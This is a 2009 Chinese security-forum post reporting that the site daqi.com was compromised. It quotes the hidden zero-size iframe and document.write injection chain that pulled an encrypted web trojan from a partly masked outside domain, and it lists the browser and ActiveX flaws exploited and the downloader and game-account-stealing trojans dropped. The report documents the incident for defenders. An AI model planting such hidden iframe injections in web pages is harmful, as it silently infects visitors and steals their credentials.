注册
登录
论坛
搜索
插件
默认风格
默认风格_6hOY
D Dark
greenwall
jeans
fashion
私人消息 (0)
公共消息 (0)
论坛任务 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
【3.A.S.T】网络安全爱好者
»
黑客播报
» 大旗网挂马事件
返回列表
发帖
可乐猫
发短消息
加为好友
可乐猫
当前离线
UID
3041
帖子
11
精华
0
积分
38
威望
49
金钱
39
阅读权限
10
在线时间
4 小时
注册时间
2008-11-10
最后登录
2011-2-17
3.A.S.T士兵
帖子
11
积分
38
威望
49
金钱
39
在线时间
4 小时
1
楼
跳转到
»
倒序看帖
打印
字体大小:
t
T
发表于 2009-2-16 17:26
|
只看该作者
大旗网挂马事件
大旗
2月15日,大旗网 (http://www.daqi.com/)被
黑客
植入病毒,
用户
如果
访问
该网站,
系统
就会
自动
从恶意网站上
下载
并
运行
恶意
程序
。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
该网站问题
代码
:
<iframe src=http://union.daqi.com/digg/win_l****.html width=0 height=0></iframe>
http://union.daqi.com/digg/win_l***.html 问题框架代码:
<iframe src=http://go.chac****.cn/w50/w50.htm width=100 height=0></iframe>
http://go.chac****.cn/w50/w50.htm问题框架代码:
document.write("<iframe width=100 height=0 src=new.html><\/iframe>");
http://go.chac****.cn/w50/new.html网马代码:
该加密网马解密后可知
利用以下
漏洞
来传播
:
MS06014
漏洞
(
clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
)
暴风影音播放器MPS.StormPlayer漏洞
RealPlayer
播放器IERPCtl.IERPCtl.1漏洞
联众
世界
游戏
大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
Real Networks RealPlayer
包含的'rmoc3260.dll' ActiveX控件存在
内存
破坏漏洞
Adobe Flash Player SWF
文件
漏洞
微软
IE7漏洞
Microsoft
Office Snapshot Viewer ActiveX Exploit
当用户访问
http://www.daqi.com/
时,系统会自动下载以下病毒文件:
http://go.chaji****.cn/jpg/cw01.
exe
病毒名:(Trojan.
Win
32.Inject.nry)
http://go.chaji****.cn/jpg/cw02.exe
病毒名:(Worm.Win32.Downloader.aaz)
http://go.chaji****.cn/jpg/cw03.exe
病毒名:(Worm.Win32.Downloader.zd)
http://go.chaji****.cn/jpg/cw04.exe
病毒名:(Trojan.Win32.Agent.bnxc)
http://go.chaji****.cn/jpg/cw05.exe
病毒名:(Worm.Win32.Downloader.aay)
http://go.chaji****.cn/jpg/cw06.exe
病毒名:(Trojan-GameThief.Win32.WOW.fgw)
http://go.chaji****.cn/jpg/cw07.exe
病毒名:(Trojan-GameThief.Win32.Magania.gen)
http://go.chaji****.cn/jpg/cw08.exe
病毒名:(Trojan.Win32.Agent.bpnf)
http://go.chaji****.cn/jpg/cw09.exe
病毒名:(Worm.Win32.Downloader.aaz)
http://go.chaji****.cn/jpg/cw10.exe
病毒名:(Trojan.Win32.Agent.bnxc)
http://go.chaji****.cn/jpg/cw11.exe
病毒名:(Worm.Win32.Downloader.za)
http://go.chaji****.cn/jpg/cw12.exe
病毒名:(Worm.Win32.Downloader.aay)
http://go.chaji****.cn/jpg/cw13.exe
病毒名:(Worm.Win32.Downloader.aay)
http://go.chaji****.cn/jpg/cw14.exe
病毒名:(Trojan-Dropper.Win32.Agent.ahcr)
http://go.chaji****.cn/jpg/cw15.exe
病毒名:(Trojan-Dropper.Win32.Agent.ahcr)
http://go.chaji****.cn/jpg/cw16.exe
病毒名:(Worm.Win32.Downloader.aay)
http://go.chaji****.cn/jpg/cw17.exe
病毒名:(Worm.Win32.Downloader.aay)
http://go.chaji****.cn/jpg/cw18.exe
病毒名:(Trojan.Win32.Agent.bpwp)
http://go.chaji****.cn/jpg/cw19.exe
病毒名:(Trojan.Win32.Agent.bpwp)
http://go.chaji****.cn/jpg/cw20.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.bkue)
http://go.chaji****.cn/jpg/cw21.exe
病毒名:(Trojan.Win32.Agent.bpnf)
http://go.chaji****.cn/jpg/cw22.exe
病毒名:(Worm.Win32.Downloader.aat)
http://go.chaji****.cn/jpg/cw23.exe
病毒名:(Worm.Win32.Downloader.aay)
http://go.chaji****.cn/jpg/cw24.exe
病毒名:(Worm.Win32.Downloader.aay)
http://go.chaji****.cn/jpg/cw25.exe
病毒名:(Trojan-GameThief.Win32.Magania.gen)
http://go.chaji****.cn/jpg/cw26.exe
病毒名:(Trojan-PSW.Win32.QQPass.fyj)
http://go.chaji****.cn/jpg/cw27.exe
病毒名:(Trojan-GameThief.Win32.OnLineGames.bkpp)
http://go.chaji****.cn/jpg/cw28.exe
病毒名:(Trojan.Win32.Agent.bnxc)
http://go.chaji****.cn/jpg/host.exe
病毒名:(Trojan.Win32.Agent.bnxc)
以上病毒文件为下载者
木马
和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。
[3.A.S.T网络安全技术讨论组]
大旗网挂马事件
收藏
分享
@@@ 加入本站会员 一个月月赚1200+的秘密@@@
柔肠寸断
发短消息
加为好友
柔肠寸断
当前离线
UID
1
帖子
3852
精华
45
积分
13044
威望
16780
金钱
36761
阅读权限
200
性别
男
在线时间
1139 小时
注册时间
2008-6-10
最后登录
2024-7-5
Administrators
帖子
3852
积分
13044
威望
16780
金钱
36761
在线时间
1139 小时
2
楼
发表于 2009-2-17 15:05
|
只看该作者
AD
@@@ 加入本站会员 一个月月赚1200+的秘密@@@
TOP
返回列表
【 新 手 入 门 】
初入江湖
有问必答
软件交流
程序设计
黑客播报
操作系统
Windows专区
Unix 专区
【 技 术 交 流 】
原创专区
QQ技巧
反黑知识
网站建设
教程发布
技术交流
免杀技术
0day发布
专题归类
私服技术
【 论 坛 水 区 】
被黑站点
激情灌水
极品贴图
开心乐园
影音专区
广告专区
【 论 坛 管 理 】
新人报到
论坛管理
勋章申请
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]
全国地图